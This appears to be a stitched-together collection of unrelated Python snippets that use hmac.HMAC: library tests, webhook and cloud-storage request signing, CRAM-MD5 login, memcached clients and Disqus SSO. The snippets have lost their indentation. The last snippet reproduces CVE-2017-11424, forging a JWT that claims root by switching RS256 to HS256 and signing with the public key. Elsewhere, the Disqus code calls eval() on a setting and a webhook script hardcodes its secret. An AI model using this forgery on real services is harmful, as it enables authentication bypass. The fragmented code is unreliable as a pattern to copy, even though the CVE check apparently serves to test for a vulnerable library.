def test_with_str_key(self):
# Pass a key of type str, which is an error, because it expects a key
# of type bytes
with self.assertRaises(TypeError):
h = hmac.HMAC("key")
def make_signature(body):
hmac_instance = hmac.HMAC(WEBHOOK_SECRET, body, hashlib.sha1)
return 'sha1=' + hmac_instance.hexdigest()
def __str__(self):
#print repr(s)
#print self.s
return hmac.HMAC(self.secret, self.s, hashlib.md5).hexdigest()
def getANewSessionId():
return str(
hmac.HMAC(key=str(uuid.uuid4()), digestmod=hashlib.sha1).hexdigest())
def create_reader(self, stored_blob, secret_key, hashfunc):
return lambda: _HMACFileReader(hmac.HMAC(secret_key, None, hashfunc),
BytesIO(stored_blob))
def createHMAC(k, digestmod=hashlib.sha1):
return hmac.HMAC(k, digestmod=digestmod)
def _hmac_sha256(key, msg):
h = hmac.HMAC(key, digestmod=hashlib.sha256)
h.update(msg)
return h.digest()
def _CRAM_MD5_AUTH(self, challenge):
""" Authobject to use with CRAM-MD5 authentication. """
import hmac
return self.user + " " + hmac.HMAC(self.password,
challenge).hexdigest()
def generate_signature(uri, key, expiry_time):
message = (uri + "\n" + str(expiry_time)).encode("utf-8")
signing_key = base64.b64decode(key.encode("utf-8"))
signed_hmac = hmac.HMAC(signing_key, message, hashlib.sha256)
signature = urllib.parse.quote(base64.b64encode(signed_hmac.digest()))
return signature
def HMAC(self, key, msg):
return hmac.HMAC(key=key, msg=msg, digestmod=self.hash).digest()
def MAC(self, key, seq, msg):
mac = hmac.HMAC(key=key, digestmod=self.hash)
seqnum = num_to_bytes(seq)
mac.update(seqnum)
mac.update(msg)
return mac.digest()[:10] + b'\x00\x01' + seqnum
def test_default_is_md5(self):
# Testing if HMAC defaults to MD5 algorithm.
# NOTE: this whitebox test depends on the hmac class internals
h = hmac.HMAC(b"key")
self.assertEqual(h.digest_cons, hashlib.md5)
def test_withmodule(self):
# Constructor call with text and digest module.
try:
h = hmac.HMAC(b"key", b"", hashlib.sha1)
except Exception:
self.fail("Constructor call with hashlib.sha1 raised exception.")
def test_with_memoryview_msg(self):
try:
h = hmac.HMAC(b"key", memoryview(b"hash this!"), digestmod="md5")
except Exception:
self.fail("Constructor call with memoryview msg raised exception.")
self.assertEqual(h.hexdigest(), '34325b639da4cfd95735b381e28cb864')
def encode_cram_md5(challenge, user, password):
challenge = base64.decodebytes(challenge)
response = user + ' ' + hmac.HMAC(password.encode('ascii'),
challenge).hexdigest()
return encode_base64(response.encode('ascii'), eol='')
from __future__ import print_function
import json
import hashlib
import hmac
import os
import sys
# Modify these for your installation.
SECRET = "iamasecret"
CONTROL = "/home/rekalltest/control"
data = sys.stdin.read()
print("""Content-type: text/html
<html><h1>
""")
# Verify the hmac.
hmac_sig = hmac.HMAC(SECRET, data, hashlib.sha1).hexdigest()
if hmac_sig != os.environ['HTTP_X_HUB_SIGNATURE'].split("=")[1]:
print("Denied")
else:
# Create the control file to kick off the test run.
print("Scheduling run.")
data = json.loads(data)
data["action"] = "start"
with open(CONTROL, "wb") as fd:
fd.write(json.dumps(data))
def publish(self, args):
"""
#**
#* Publish
#*
#* Send a message to a channel.
#*
#* @param array args with channel and message.
#* @return array success information.
#**
## Publish Example
def publish_complete(info):
print(info)
pubnub.publish({
'channel' : 'hello_world',
'message' : {
'some_text' : 'Hello my World'
},
'callback' : publish_complete
})
"""
## Fail if bad input.
if not (args['channel'] and args['message']):
print('Missing Channel or Message')
return False
## Capture User Input
channel = str(args['channel'])
message = args['message']
if self.cipher_key:
pc = PubnubCrypto()
out = []
if type(message) == type(list()):
for item in message:
encryptItem = pc.encrypt(self.cipher_key, item).rstrip()
out.append(encryptItem)
message = json.dumps(out)
elif type(message) == type(dict()):
outdict = {}
for k, item in message.iteritems():
encryptItem = pc.encrypt(self.cipher_key, item).rstrip()
outdict[k] = encryptItem
out.append(outdict)
message = json.dumps(out[0])
else:
message = json.dumps(
pc.encrypt(self.cipher_key, message).replace('\n', ''))
else:
message = json.dumps(args['message'])
## Capture Callback
if args.has_key('callback'):
callback = args['callback']
else:
callback = lambda x: x
## Sign Message
if self.secret_key:
hashObject = sha256()
hashObject.update(self.secret_key)
hashedSecret = hashObject.hexdigest()
hash = hmac.HMAC(hashedSecret,
'/'.join([
self.publish_key, self.subscribe_key,
self.secret_key, channel, message
]),
digestmod=digestmod)
signature = hash.hexdigest()
else:
signature = '0'
## Send Message
return self._request([
'publish', self.publish_key, self.subscribe_key, signature,
channel, '0', message
], callback)
def blob(self, method, account, path, body=None, headers=None, tag=None):
debug('blob: %s %s %s %s %s\n' %
(method, account, path, repr(body[:1024]) if isinstance(
body, basestring) else str(body), headers))
headers_dict = {}
if headers is not None:
for h in headers:
name, val = h.split(':', 1)
name = name.strip().lower()
val = val.strip()
headers_dict[name] = val
if body and 'content-type' not in headers_dict:
headers_dict['content-type'] = 'application/octet-stream'
md5 = hashlib.md5()
md5.update(body)
headers_dict['content-md5'] = base64.b64encode(md5.digest())
date = time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime())
headers_dict['x-ms-date'] = date
if 'x-ms-version' not in headers_dict:
headers_dict['x-ms-version'] = '2015-04-05'
if account is None:
m = re.match(
r'https?://([^\.]+)\.blob\.%s(.*)$' %
self.environment.core.replace('.', '\\.'), path)
if m:
account = m.group(1)
path = m.group(2)
markers = []
result = []
while True:
marker_path = path
if markers:
marker_path += '&marker=' + markers[0]
path_for_sig, sep, query = marker_path.partition('?')
if query:
params = {}
for p in query.split('&'):
n, v = p.split('=', 1)
v = urllib2.unquote(v)
if '\n' in v or ',' in v:
raise Exception('cannot sign url with "\\n" or ","')
if n not in params:
params[n] = []
params[n].append(v)
for n in sorted(params):
path_for_sig += ('\n' + urllib2.unquote(n) + ':' +
','.join(params[n]))
data = (
method + '\n' + headers_dict.get('content-encoding', '') +
'\n' + headers_dict.get('content-language', '') + '\n' +
(str(len(body)) if body else '') + '\n' + # content-length
headers_dict.get('content-md5', '') + '\n' +
headers_dict.get('content-type', '') + '\n' +
headers_dict.get('date', '') + '\n' +
headers_dict.get('if-modified-since', '') + '\n' +
headers_dict.get('if-match', '') + '\n' +
headers_dict.get('if-none-match', '') + '\n' +
headers_dict.get('if-unmodified-since', '') + '\n' +
headers_dict.get('range', '') + '\n')
for h in sorted(headers_dict):
if h.startswith('x-ms'):
data += h + ':' + headers_dict[h] + '\n'
account, key = self.account_key(account)
data += '/' + account + path_for_sig
sig = base64.b64encode(
hmac.HMAC(base64.b64decode(key), data,
hashlib.sha256).digest())
headers_dict['authorization'] = 'SharedKey ' + account + ':' + sig
headers = ['%s: %s' % (n, headers_dict[n]) for n in headers_dict]
h, b = request(method,
'https://' + account + '.blob.' +
self.environment.core + marker_path,
body=body,
headers=headers,
pool=self.pool,
max_time=self.max_time)
if not tag:
return h, b
result += [e for e in b.getElementsByTagName(tag)]
markers = values(b, 'NextMarker')
if not markers:
break
b = xml.dom.minidom.parseString('<' + tag + 's/>')
for e in result:
b.documentElement.appendChild(e)
return {}, b
class MemcachedClient(object):
"""Simple memcached client."""
vbucketId = 0
def __init__(self, host='127.0.0.1', port=11211, family=socket.AF_INET):
self.host = host
self.port = port
self.s = socket.socket(family, socket.SOCK_STREAM)
if hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
self.s.connect_ex(host)
else:
self.s.connect_ex((host, port))
self.r = random.Random()
def close(self):
self.s.close()
def __del__(self):
self.close()
def _sendCmd(self, cmd, key, val, opaque, extraHeader='', cas=0):
self._sendMsg(cmd,
key,
val,
opaque,
extraHeader=extraHeader,
cas=cas,
vbucketId=self.vbucketId)
def _sendMsg(self,
cmd,
key,
val,
opaque,
extraHeader='',
cas=0,
dtype=0,
vbucketId=0,
fmt=REQ_PKT_FMT,
magic=REQ_MAGIC_BYTE):
msg = struct.pack(fmt, magic, cmd, len(key), len(extraHeader), dtype,
vbucketId,
len(key) + len(extraHeader) + len(val), opaque, cas)
self.s.send(msg + extraHeader + key + val)
def _recvMsg(self):
response = ""
while len(response) < MIN_RECV_PACKET:
data = self.s.recv(MIN_RECV_PACKET - len(response))
if data == '':
raise exceptions.EOFError("Got empty data (remote died?).")
response += data
assert len(response) == MIN_RECV_PACKET
magic, cmd, keylen, extralen, dtype, errcode, remaining, opaque, cas=\
struct.unpack(RES_PKT_FMT, response)
rv = ""
while remaining > 0:
data = self.s.recv(remaining)
if data == '':
raise exceptions.EOFError("Got empty data (remote died?).")
rv += data
remaining -= len(data)
assert (magic
in (RES_MAGIC_BYTE, REQ_MAGIC_BYTE)), "Got magic: %d" % magic
return cmd, errcode, opaque, cas, keylen, extralen, rv
def _handleKeyedResponse(self, myopaque):
cmd, errcode, opaque, cas, keylen, extralen, rv = self._recvMsg()
assert myopaque is None or opaque == myopaque, \
"expected opaque %x, got %x" % (myopaque, opaque)
if errcode != 0:
raise MemcachedError(errcode, rv)
return cmd, opaque, cas, keylen, extralen, rv
def _handleSingleResponse(self, myopaque):
cmd, opaque, cas, keylen, extralen, data = self._handleKeyedResponse(
myopaque)
return opaque, cas, data
def _doCmd(self, cmd, key, val, extraHeader='', cas=0):
"""Send a command and await its response."""
opaque = self.r.randint(0, 2**32)
self._sendCmd(cmd, key, val, opaque, extraHeader, cas)
return self._handleSingleResponse(opaque)
def _mutate(self, cmd, key, exp, flags, cas, val):
return self._doCmd(cmd, key, val, struct.pack(SET_PKT_FMT, flags, exp),
cas)
def _cat(self, cmd, key, cas, val):
return self._doCmd(cmd, key, val, '', cas)
def append(self, key, value, cas=0):
return self._cat(memcacheConstants.CMD_APPEND, key, cas, value)
def prepend(self, key, value, cas=0):
return self._cat(memcacheConstants.CMD_PREPEND, key, cas, value)
def __incrdecr(self, cmd, key, amt, init, exp):
something, cas, val = self._doCmd(
cmd, key, '',
struct.pack(memcacheConstants.INCRDECR_PKT_FMT, amt, init, exp))
return struct.unpack(INCRDECR_RES_FMT, val)[0], cas
def incr(self, key, amt=1, init=0, exp=0):
"""Increment or create the named counter."""
return self.__incrdecr(memcacheConstants.CMD_INCR, key, amt, init, exp)
def decr(self, key, amt=1, init=0, exp=0):
"""Decrement or create the named counter."""
return self.__incrdecr(memcacheConstants.CMD_DECR, key, amt, init, exp)
def _doMetaCmd(self, cmd, key, value, cas, exp, flags, seqno, remote_cas):
extra = struct.pack('>IIQQ', flags, exp, seqno, remote_cas)
return self._doCmd(cmd, key, value, extra, cas)
def _doRevCmd(self, cmd, key, exp, flags, value, rev, cas=0):
seqno, revid = rev
meta_data = struct.pack('>I', seqno) + revid
meta_type = memcacheConstants.META_REVID
meta = (meta_type, meta_data)
return self._doMetaCmd(cmd, key, exp, flags, value, meta, cas)
def set(self, key, exp, flags, val):
"""Set a value in the memcached server."""
return self._mutate(memcacheConstants.CMD_SET, key, exp, flags, 0, val)
def setWithMeta(self, key, value, exp, flags, seqno, remote_cas):
"""Set a value and its meta data in the memcached server."""
return self._doMetaCmd(memcacheConstants.CMD_SET_WITH_META, key, value,
0, exp, flags, seqno, remote_cas)
def setWithRev(self, key, exp, flags, value, rev):
"""Set a value and its revision in the memcached server."""
return self._doRevCmd(memcacheConstants.CMD_SET_WITH_META, key, exp,
flags, value, rev)
def add(self, key, exp, flags, val):
"""Add a value in the memcached server iff it doesn't already exist."""
return self._mutate(memcacheConstants.CMD_ADD, key, exp, flags, 0, val)
def addWithMeta(self, key, value, exp, flags, seqno, remote_cas):
return self._doMetaCmd(memcacheConstants.CMD_ADD_WITH_META, key, value,
0, exp, flags, seqno, remote_cas)
def addWithRev(self, key, exp, flags, value, rev):
return self._doRevCmd(memcacheConstants.CMD_ADD_WITH_META, key, exp,
flags, value, rev)
def replace(self, key, exp, flags, val):
"""Replace a value in the memcached server iff it already exists."""
return self._mutate(memcacheConstants.CMD_REPLACE, key, exp, flags, 0,
val)
def observe(self, key, vbucket):
"""Observe a key for persistence and replication."""
value = struct.pack('>HH', vbucket, len(key)) + key
opaque, cas, data = self._doCmd(memcacheConstants.CMD_OBSERVE, '',
value)
rep_time = (cas & 0xFFFFFFFF)
persist_time = (cas >> 32) & 0xFFFFFFFF
persisted = struct.unpack('>B', data[4 + len(key)])[0]
return opaque, rep_time, persist_time, persisted
def __parseGet(self, data, klen=0):
flags = struct.unpack(memcacheConstants.GET_RES_FMT, data[-1][:4])[0]
return flags, data[1], data[-1][4 + klen:]
def get(self, key):
"""Get the value for a given key within the memcached server."""
parts = self._doCmd(memcacheConstants.CMD_GET, key, '')
return self.__parseGet(parts)
def __parseMeta(self, data):
flags = struct.unpack('I', data[-1][0:4])[0]
meta_type = struct.unpack('B', data[-1][4])[0]
length = struct.unpack('B', data[-1][5])[0]
meta = data[-1][6:6 + length]
return (meta_type, flags, meta)
def getMeta(self, key):
"""Get the metadata for a given key within the memcached server."""
parts = self._doCmd(memcacheConstants.CMD_GET_META, key, '')
return self.__parseMeta(parts)
def getRev(self, key):
"""Get the revision for a given key within the memcached server."""
(meta_type, flags, meta_data) = self.getMeta(key)
if meta_type != memcacheConstants.META_REVID:
raise ValueError("Invalid meta type %x" % meta_type)
seqno = struct.unpack('>Q', meta_data[:8])[0]
revid = meta_data[4:]
return (seqno, revid)
def getl(self, key, exp=15):
"""Get the value for a given key within the memcached server."""
parts = self._doCmd(memcacheConstants.CMD_GET_LOCKED, key, '',
struct.pack(memcacheConstants.GETL_PKT_FMT, exp))
return self.__parseGet(parts)
def cas(self, key, exp, flags, oldVal, val):
"""CAS in a new value for the given key and comparison value."""
self._mutate(memcacheConstants.CMD_SET, key, exp, flags, oldVal, val)
def touch(self, key, exp):
"""Touch a key in the memcached server."""
return self._doCmd(memcacheConstants.CMD_TOUCH, key, '',
struct.pack(memcacheConstants.TOUCH_PKT_FMT, exp))
def gat(self, key, exp):
"""Get the value for a given key and touch it within the memcached server."""
parts = self._doCmd(memcacheConstants.CMD_GAT, key, '',
struct.pack(memcacheConstants.GAT_PKT_FMT, exp))
return self.__parseGet(parts)
def getr(self, key):
"""Get the value for a given key in a replica vbucket within the memcached server."""
parts = self._doCmd(memcacheConstants.CMD_GET_REPLICA, key, '')
return self.__parseGet(parts, len(key))
def version(self):
"""Get the value for a given key within the memcached server."""
return self._doCmd(memcacheConstants.CMD_VERSION, '', '')
def verbose(self, level):
"""Set the verbosity level."""
return self._doCmd(memcacheConstants.CMD_VERBOSE,
'',
'',
extraHeader=struct.pack(">I", level))
def sasl_mechanisms(self):
"""Get the supported SASL methods."""
return set(
self._doCmd(memcacheConstants.CMD_SASL_LIST_MECHS, '',
'')[2].split(' '))
def sasl_auth_start(self, mech, data):
"""Start a sasl auth session."""
return self._doCmd(memcacheConstants.CMD_SASL_AUTH, mech, data)
def sasl_auth_plain(self, user, password, foruser=''):
"""Perform plain auth."""
return self.sasl_auth_start('PLAIN',
'\0'.join([foruser, user, password]))
def sasl_auth_cram_md5(self, user, password):
"""Start a plan auth session."""
try:
self.sasl_auth_start('CRAM-MD5', '')
except MemcachedError, e:
if e.status != memcacheConstants.ERR_AUTH_CONTINUE:
raise
challenge = e.msg
dig = hmac.HMAC(password, challenge).hexdigest()
return self._doCmd(memcacheConstants.CMD_SASL_STEP, 'CRAM-MD5',
user + ' ' + dig)
def sasl_auth_plain(self, user, password, foruser=''):
"""Perform plain auth."""
return self.sasl_auth_start('PLAIN',
'\0'.join([foruser, user, password]))
def sasl_auth_cram_md5(self, user, password):
"""Start a plan auth session."""
try:
self.sasl_auth_start('CRAM-MD5', '')
except MemcachedError, e:
if e.status != memcacheConstants.ERR_AUTH_CONTINUE:
raise
challenge = e.msg
dig = hmac.HMAC(password, challenge).hexdigest()
return self._doCmd(memcacheConstants.CMD_SASL_STEP, 'CRAM-MD5',
user + ' ' + dig)
def stop_persistence(self):
return self._doCmd(memcacheConstants.CMD_STOP_PERSISTENCE, '', '')
def start_persistence(self):
return self._doCmd(memcacheConstants.CMD_START_PERSISTENCE, '', '')
def set_flush_param(self, key, val):
print "setting flush param:", key, val
return self._doCmd(memcacheConstants.CMD_SET_FLUSH_PARAM, key, val)
def stop_replication(self):
return self._doCmd(memcacheConstants.CMD_STOP_REPLICATION, '', '')
def checkPassword(self, password):
verify = hexlify(hmac.HMAC(password, self.challenge).digest())
return verify == self.response
def _new_auth(self):
if self.key:
self.auth = hmac.HMAC(self.key, digestmod=self.digest_mod)
else:
self.auth = None
def expected_digest(self, secret_key, value, hashfunc):
return hmac.HMAC(secret_key, value, hashfunc).digest()
def create_sig_from_msg(key, msg):
sig = hmac.HMAC(key.encode(), msg.encode(), "sha256").digest()
sig = base64.b64encode(sig)
return sig
def test_input_too_short(self, secret_key, hashfunc):
with pytest.raises(VerificationException):
_HMACFileReader(hmac.HMAC(secret_key, None, hashfunc),
BytesIO(b"a"))
def disqus_sso(context):
"""
Return the HTML/js code to enable DISQUS SSO - so logged in users on
your site can be logged in to disqus seemlessly.
"""
DISQUS_SECRET_KEY = getattr(settings, 'DISQUS_SECRET_KEY', None)
if DISQUS_SECRET_KEY is None:
return "<p>You need to set DISQUS_SECRET_KEY before you can use SSO</p>"
DISQUS_PUBLIC_KEY = getattr(settings, 'DISQUS_PUBLIC_KEY', None)
if DISQUS_PUBLIC_KEY is None:
return "<p>You need to set DISQUS_PUBLIC_KEY before you can use SSO</p>"
SSO_AVATAR = getattr(settings, 'SSO_AVATAR', None)
SSO_NAME = getattr(settings, 'SSO_NAME', None)
SSO_BUTTON = getattr(settings, 'SSO_BUTTON', None)
SSO_ICON = getattr(settings, 'SSO_ICON', None)
SSO_URL = getattr(settings, 'SSO_URL', None)
SSO_LOGOUT = getattr(settings, 'SSO_LOGOUT', None)
SSO_WIDTH = getattr(settings, 'SSO_WIDTH', None)
SSO_HEIGHT = getattr(settings, 'SSO_HEIGHT', None)
user = context['user']
if user.is_authenticated():
# create a JSON packet of our data attributes
data = json.dumps({
'id': user.id,
'username': user.username,
'email': user.email,
'avatar': eval(SSO_AVATAR),
})
# encode the data to base64
message = base64.b64encode(data.encode('utf-8')).decode()
else:
message = None
# generate a timestamp for signing the message
timestamp = int(time.time())
key = DISQUS_SECRET_KEY.encode('utf-8')
msg = ('%s %s' % (message, timestamp)).encode('utf-8')
digestmod = hashlib.sha1
# generate our hmac signature
sig = hmac.HMAC(key, msg, digestmod).hexdigest()
return dict(
message = message,
timestamp = timestamp,
sig = sig,
pub_key = DISQUS_PUBLIC_KEY,
SSO_NAME = SSO_NAME,
SSO_BUTTON = SSO_BUTTON,
SSO_ICON = SSO_ICON,
SSO_URL = SSO_URL,
SSO_LOGOUT = SSO_LOGOUT,
SSO_WIDTH = SSO_WIDTH,
SSO_HEIGHT = SSO_HEIGHT,
)
def encode_cram_md5(challenge, user, password):
challenge = base64.decodestring(challenge)
response = user + " " + hmac.HMAC(password, challenge).hexdigest()
return encode_base64(response, eol="")
class MemcachedClient(object):
"""Simple memcached client."""
vbucketId = 0
def __init__(self, host='127.0.0.1', port=11211, family=socket.AF_UNSPEC):
self.host = host
self.port = port
# Iterate all addresses for the given family; using the first
# one we can successfully connect to. If none succeed raise
# the last attempted as an exception.
for info in socket.getaddrinfo(self.host, self.port, family,
socket.SOCK_STREAM):
_family, socktype, proto, _, sockaddr = info
try:
sock = socket.socket(_family, socktype, proto)
sock.settimeout(10)
sock.connect(sockaddr)
self.s = sock
break
except socket.error as sock_error:
# If we get here socket objects will be close()d via
# garbage collection.
pass
else:
# Didn't break from the loop, re-raise the last error
raise sock_error
self.s.setblocking(0)
self.r = random.Random()
self.req_features = set()
self.features = set()
self.error_map = None
self.error_map_version = 1
self.collection_map = {}
self.log = logger.Logger.get_logger()
def close(self):
self.s.close()
def __del__(self):
self.close()
def _sendCmd(self,
cmd,
key,
val,
opaque,
extraHeader='',
cas=0,
collection=None):
self._sendMsg(cmd,
key,
val,
opaque,
extraHeader=extraHeader,
cas=cas,
vbucketId=self.vbucketId,
collection=collection)
def _sendMsg(self,
cmd,
key,
val,
opaque,
extraHeader='',
cas=0,
dtype=0,
vbucketId=0,
fmt=REQ_PKT_FMT,
magic=REQ_MAGIC_BYTE,
collection=None):
if collection:
key = self._encodeCollectionId(key, collection)
msg = struct.pack(fmt, magic, cmd, len(key), len(extraHeader), dtype,
vbucketId,
len(key) + len(extraHeader) + len(val), opaque, cas)
self.s.sendall(msg + extraHeader + key + val)
def _socketRecv(self, amount):
ready = select.select([self.s], [], [], 30)
if ready[0]:
return self.s.recv(amount)
raise TimeoutError(30)
def _recvMsg(self):
response = ""
while len(response) < MIN_RECV_PACKET:
data = self._socketRecv(MIN_RECV_PACKET - len(response))
if data == '':
raise exceptions.EOFError("Got empty data (remote died?).")
response += data
assert len(response) == MIN_RECV_PACKET
magic, cmd, keylen, extralen, dtype, errcode, remaining, opaque, cas=\
struct.unpack(RES_PKT_FMT, response)
rv = ""
while remaining > 0:
data = self._socketRecv(remaining)
if data == '':
raise exceptions.EOFError("Got empty data (remote died?).")
rv += data
remaining -= len(data)
assert (magic
in (RES_MAGIC_BYTE, REQ_MAGIC_BYTE)), "Got magic: %d" % magic
return cmd, errcode, opaque, cas, keylen, extralen, rv
def _handleKeyedResponse(self, myopaque):
cmd, errcode, opaque, cas, keylen, extralen, rv = self._recvMsg()
assert myopaque is None or opaque == myopaque, \
"expected opaque %x, got %x" % (myopaque, opaque)
if errcode != 0:
if self.error_map is None:
msg = rv
else:
err = self.error_map['errors'].get(errcode, rv)
msg = "{name} : {desc} : {rv}".format(rv=rv, **err)
raise MemcachedError(errcode, msg)
return cmd, opaque, cas, keylen, extralen, rv
def _handleSingleResponse(self, myopaque):
cmd, opaque, cas, keylen, extralen, data = self._handleKeyedResponse(
myopaque)
return opaque, cas, data
def _doCmd(self, cmd, key, val, extraHeader='', cas=0, collection=None):
"""Send a command and await its response."""
opaque = self.r.randint(0, 2**32)
self._sendCmd(cmd, key, val, opaque, extraHeader, cas, collection)
return self._handleSingleResponse(opaque)
def _mutate(self, cmd, key, exp, flags, cas, val, collection):
return self._doCmd(cmd, key, val, struct.pack(SET_PKT_FMT, flags, exp),
cas, collection)
def _cat(self, cmd, key, cas, val, collection):
return self._doCmd(cmd, key, val, '', cas, collection)
def hello(self, name):
resp = self._doCmd(
memcacheConstants.CMD_HELLO, name,
struct.pack('>' + 'H' * len(self.req_features),
*self.req_features))
supported = resp[2]
for i in range(0, len(supported), struct.calcsize(">H")):
self.features.update(struct.unpack_from(">H", supported, i))
if self.is_xerror_supported():
self.error_map = self.get_error_map()
return resp
def append(self, key, value, cas=0, collection=None):
return self._cat(memcacheConstants.CMD_APPEND, key, cas, value,
collection)
def prepend(self, key, value, cas=0, collection=None):
return self._cat(memcacheConstants.CMD_PREPEND, key, cas, value,
collection)
def __incrdecr(self, cmd, key, amt, init, exp, collection):
something, cas, val = self._doCmd(
cmd,
key,
'',
struct.pack(memcacheConstants.INCRDECR_PKT_FMT, amt, init, exp),
collection=collection)
return struct.unpack(INCRDECR_RES_FMT, val)[0], cas
def incr(self, key, amt=1, init=0, exp=0, collection=None):
"""Increment or create the named counter."""
return self.__incrdecr(memcacheConstants.CMD_INCR, key, amt, init, exp,
collection)
def decr(self, key, amt=1, init=0, exp=0, collection=None):
"""Decrement or create the named counter."""
return self.__incrdecr(memcacheConstants.CMD_DECR, key, amt, init, exp,
collection)
def _doMetaCmd(self, cmd, key, value, cas, exp, flags, seqno, remote_cas):
extra = struct.pack('>IIQQ', flags, exp, seqno, remote_cas)
return self._doCmd(cmd, key, value, extra, cas)
def set(self, key, exp, flags, val, collection=None):
"""Set a value in the memcached server."""
return self._mutate(memcacheConstants.CMD_SET, key, exp, flags, 0, val,
collection)
def setWithMeta(self, key, value, exp, flags, seqno, remote_cas):
"""Set a value and its meta data in the memcached server."""
return self._doMetaCmd(memcacheConstants.CMD_SET_WITH_META, key, value,
0, exp, flags, seqno, remote_cas)
def delWithMeta(self, key, exp, flags, seqno, remote_cas, collection=None):
return self._doMetaCmd(memcacheConstants.CMD_DELETE_WITH_META, key, '',
0, exp, flags, seqno, remote_cas, collection)
def add(self, key, exp, flags, val, collection=None):
"""Add a value in the memcached server iff it doesn't already exist."""
return self._mutate(memcacheConstants.CMD_ADD, key, exp, flags, 0, val,
collection)
def addWithMeta(self,
key,
value,
exp,
flags,
seqno,
remote_cas,
collection=None):
return self._doMetaCmd(memcacheConstants.CMD_ADD_WITH_META, key, value,
0, exp, flags, seqno, remote_cas, collection)
def replace(self, key, exp, flags, val, collection=None):
"""Replace a value in the memcached server iff it already exists."""
return self._mutate(memcacheConstants.CMD_REPLACE, key, exp, flags, 0,
val, collection)
def observe(self, key, vbucket, collection=None):
"""Observe a key for persistence and replication."""
value = struct.pack('>HH', vbucket, len(key)) + key
opaque, cas, data = self._doCmd(memcacheConstants.CMD_OBSERVE,
'',
value,
collection=collection)
rep_time = (cas & 0xFFFFFFFF)
persist_time = (cas >> 32) & 0xFFFFFFFF
persisted = struct.unpack('>B', data[4 + len(key)])[0]
return opaque, rep_time, persist_time, persisted
def __parseGet(self, data, klen=0):
flags = struct.unpack(memcacheConstants.GET_RES_FMT, data[-1][:4])[0]
return flags, data[1], data[-1][4 + klen:]
def get(self, key, collection=None):
"""Get the value for a given key within the memcached server."""
parts = self._doCmd(memcacheConstants.CMD_GET,
key,
'',
collection=collection)
return self.__parseGet(parts)
def getMeta(self, key, collection=None):
"""Get the metadata for a given key within the memcached server."""
opaque, cas, data = self._doCmd(memcacheConstants.CMD_GET_META,
key,
'',
collection=collection)
deleted = struct.unpack('>I', data[0:4])[0]
flags = struct.unpack('>I', data[4:8])[0]
exp = struct.unpack('>I', data[8:12])[0]
seqno = struct.unpack('>Q', data[12:20])[0]
return (deleted, flags, exp, seqno, cas)
def getl(self, key, exp=15, collection=None):
"""Get the value for a given key within the memcached server."""
parts = self._doCmd(memcacheConstants.CMD_GET_LOCKED,
key,
'',
struct.pack(memcacheConstants.GETL_PKT_FMT, exp),
collection=collection)
return self.__parseGet(parts)
def cas(self, key, exp, flags, oldVal, val, collection=None):
"""CAS in a new value for the given key and comparison value."""
self._mutate(memcacheConstants.CMD_SET, key, exp, flags, oldVal, val,
collection)
def touch(self, key, exp, collection=None):
"""Touch a key in the memcached server."""
return self._doCmd(memcacheConstants.CMD_TOUCH,
key,
'',
struct.pack(memcacheConstants.TOUCH_PKT_FMT, exp),
collection=collection)
def gat(self, key, exp, collection=None):
"""Get the value for a given key and touch it within the memcached server."""
parts = self._doCmd(memcacheConstants.CMD_GAT,
key,
'',
struct.pack(memcacheConstants.GAT_PKT_FMT, exp),
collection=collection)
return self.__parseGet(parts)
def getr(self, key, collection=None):
"""Get the value for a given key in a replica vbucket within the memcached server."""
parts = self._doCmd(memcacheConstants.CMD_GET_REPLICA,
key,
'',
collection=collection)
return self.__parseGet(parts, len(key))
def version(self):
"""Get the value for a given key within the memcached server."""
return self._doCmd(memcacheConstants.CMD_VERSION, '', '')
def verbose(self, level):
"""Set the verbosity level."""
return self._doCmd(memcacheConstants.CMD_VERBOSE,
'',
'',
extraHeader=struct.pack(">I", level))
def sasl_mechanisms(self):
"""Get the supported SASL methods."""
return set(
self._doCmd(memcacheConstants.CMD_SASL_LIST_MECHS, '',
'')[2].split(' '))
def sasl_auth_start(self, mech, data):
"""Start a sasl auth session."""
return self._doCmd(memcacheConstants.CMD_SASL_AUTH, mech, data)
def sasl_auth_plain(self, user, password, foruser=''):
"""Perform plain auth."""
return self.sasl_auth_start('PLAIN',
'\0'.join([foruser, user, password]))
def sasl_auth_cram_md5(self, user, password):
"""Start a plan auth session."""
try:
self.sasl_auth_start('CRAM-MD5', '')
except MemcachedError, e:
if e.status != memcacheConstants.ERR_AUTH_CONTINUE:
raise
challenge = e.msg
dig = hmac.HMAC(password, challenge).hexdigest()
return self._doCmd(memcacheConstants.CMD_SASL_STEP, 'CRAM-MD5',
user + ' ' + dig)
def sign_string(s, key, algo="sha256", timedelta=30):
digestmod = getattr(hashlib, algo)
hash = hmac.HMAC(bytes(key,"utf-8"), digestmod=digestmod, msg=bytes(s,"utf-8"))
return hash.digest()
print("Testing CVE-2017-11424")
private_key = open("standard.pem", "r").read()
public_key = open("standard.pub.pem", "r").read()
cve_exp = int(time.time()) + 86400
cve = jwt.encode(
{
"iss": "joe",
"exp": cve_exp,
"http://example.com/is_root": True
},
private_key,
algorithm="RS256")
jwt.decode(cve, public_key, algorithm="RS256")
cve_parts = cve.split(b'.')
print(cve)
cve_msg = b'.'.join(cve_parts[0:2])
alg = b64urldecode(cve_parts[0].decode('utf8'))
alg_tampered = b64urlencode(alg.replace(b"RS256", b"HS256"))
tamper_hmac = b64urlencode(
hmac.HMAC(public_key.encode('ascii'),
b'.'.join([alg_tampered,
cve_parts[1]]), hashlib.sha256).digest())
cve_tampered = b'.'.join([alg_tampered, cve_parts[1], tamper_hmac])
print(cve_tampered)
jwt.decode(cve_tampered, public_key)
print("\nUsing a vulnerable library, good.")
